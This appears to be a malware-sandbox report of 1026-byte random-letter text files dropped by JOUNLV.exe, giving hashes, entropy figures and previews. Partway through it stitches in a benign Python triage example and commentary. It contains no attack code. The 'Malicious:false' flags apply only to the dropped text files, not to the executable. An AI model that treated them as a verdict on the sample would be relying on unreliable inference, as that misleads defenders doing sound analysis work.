                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
Entropy (8bit):4.700014595314478
Encrypted:false
SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:960373CA97DEDBA8576ECF40D0D1E39D
SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:false
Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.688505748329201
Encrypted:false
SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
MD5:E791BC4BB488A2AE526214AB2CCF03F0
SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
Malicious:false
Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.690895772725941
Encrypted:false
SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:A002E80B55673139253599B753BDC01A
SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:false
Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.690394987545919
Encrypted:false
SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:CA901F8E74EB7955CF06A00BD424C0C2
SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:false
Preview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
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.69782189124949
Encrypted:false
SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:0640503E533EFB11CC70F43D2FFF4E26
SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:false
Preview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
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.700014595314478
Encrypted:false
SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:960373CA97DEDBA8576ECF40D0D1E39D
SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:false
Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6994061563025005
Encrypted:false
SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:false
Preview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
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.688505748329201
Encrypted:false
SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
MD5:E791BC4BB488A2AE526214AB2CCF03F0
SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
Malicious:false
Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP
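The dropped-file entries above all share one shape: JOUNLV.exe writes 1026-byte ASCII files, a single 1024-character line of upper-case letters followed by CRLF, each scoring an 8-bit entropy of roughly 4.69 to 4.70, and several entries repeat the same MD5/SHA-256 under what are evidently different paths. The Python below is an added triage example, not code from the Joe Sandbox report or from the sample; it reproduces those numbers on a constructed, seeded stand-in so the figures can be sanity-checked offline. It assumes that the report's "Entropy (8bit)" field is plain Shannon entropy in bits per byte over the byte histogram; the structural check, the sample generator and every function name are this example's own.

```python
import hashlib
import math
import random
from collections import Counter

UPPER = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte over the byte histogram.
    Assumed to be the definition behind the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def max_entropy_bits(alphabet_size: int) -> float:
    """Ceiling for data drawn from `alphabet_size` distinct symbols (log2(26) for A-Z text)."""
    return math.log2(alphabet_size)


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests in the four algorithms the report lists per file."""
    return {
        algo: hashlib.new(algo, data).hexdigest().upper()
        for algo in ("md5", "sha1", "sha256", "sha512")
    }


def looks_like_jounlv_text_drop(data: bytes) -> bool:
    """Structural check for the pattern in the entries above: exactly 1026 bytes,
    one 1024-byte line of A-Z, terminated by CRLF. Hypothetical name for this example."""
    if len(data) != 1026 or not data.endswith(b"\r\n"):
        return False
    body = data[:-2]
    return len(body) == 1024 and all(b in UPPER for b in body)


def make_sample(seed: int) -> bytes:
    """Constructed stand-in for one dropped file; seeded so the output is reproducible."""
    rng = random.Random(seed)
    return bytes(rng.choice(UPPER) for _ in range(1024)) + b"\r\n"


def dedupe_by_sha256(blobs) -> dict:
    """Count how many dropped paths carry identical content, as several entries above do,
    so identical files are scanned and triaged once rather than once per path."""
    counts = {}
    for blob in blobs:
        digest = hashlib.sha256(blob).hexdigest().upper()
        counts[digest] = counts.get(digest, 0) + 1
    return counts


if __name__ == "__main__":
    sample = make_sample(1)
    print("structural match:", looks_like_jounlv_text_drop(sample))
    print("entropy:", round(shannon_entropy_8bit(sample), 6),
          "ceiling log2(26):", round(max_entropy_bits(26), 6))
    print("hashes:", file_hashes(sample))
    print("unique contents:", dedupe_by_sha256([sample, sample, make_sample(2)]))
```

log2(26) is about 4.70, which is why every entry sits just under that ceiling and is reported as Encrypted:false: these are letters-only text files, not ciphertext or a packed payload, which would score close to 8.0 bits per byte for a blob of this size. Because the same SHA-256 recurs across entries, hash the dropped set and dedupe before spending scanner or analyst time on each path.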
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
